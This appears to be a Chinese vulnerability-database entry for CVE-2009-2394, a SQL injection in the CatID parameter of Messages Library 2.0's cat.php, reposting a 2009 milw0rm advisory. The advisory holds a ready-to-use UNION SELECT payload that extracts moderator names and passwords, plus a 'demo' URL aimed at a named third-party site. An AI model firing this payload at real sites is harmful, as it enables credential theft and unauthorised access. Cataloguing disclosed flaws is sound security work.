Smspages Mr.Saphp Arabic Script Mobile cat.php CatID参数SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118038 漏洞类型 SQL注入
发布时间 2009-06-29 更新时间 2009-06-29
CVE编号 CVE-2009-2394 CNNVD-ID CNNVD-200907-156
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9027
https://www.securityfocus.com/bid/43751
https://cxsecurity.com/issue/WLB-2009070103
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-156
|漏洞详情
Mr.SaphpArabicScriptMobile(akaMessagesLibrary)2.0的cat.phpinSMSPages1.0存在SQL注入漏洞,远程攻击者可以通过CatID参数执行任意SQL命令。
|漏洞EXP
+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____  
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\
+===================================================================================+
|                                                                                   |
|                                                                                   |
|        Messages Library v2.0 Cat.php SQL Injection Vulnerabilities                |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: Black Dream                                                              |
| Contact: Be5_at_HoTMail_dot_Fr                                                    |
| HoMe   : www.sec-r1z.com                                                          |
|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
+===================================================================================+
|                                                                                   |
| Script.: http://www.traidnt.net/vb/showthread.php?t=31814                         |
|Donwload: http://www.traidnt.net/vb/attachment.php?attachmentid=16341&d=1126191996 |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                  
| Exploit:                                                                          
|                                                                                                                                                                    
| http://[website]/[script]/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor
|                                                                                   
| [+] Demo                                                                         
|                                                                                   
|                                                                                   
| http://www.m3la.com/sms/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor                                                                               
|                                                                                                                                                    
+-----------------------------------------------------------------------------------+

+===================================================================================+
|                                                                                   |
| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0              |
|                       And All #sec-r1z memb3rz!!!!                                |
+===================================================================================+
E0D|F

# milw0rm.com [2009-06-29]
|受影响的产品
Traidnt Messages Library 2.0
|参考资料

来源:MILW0RM
名称:9027
链接:http://www.milw0rm.com/exploits/9027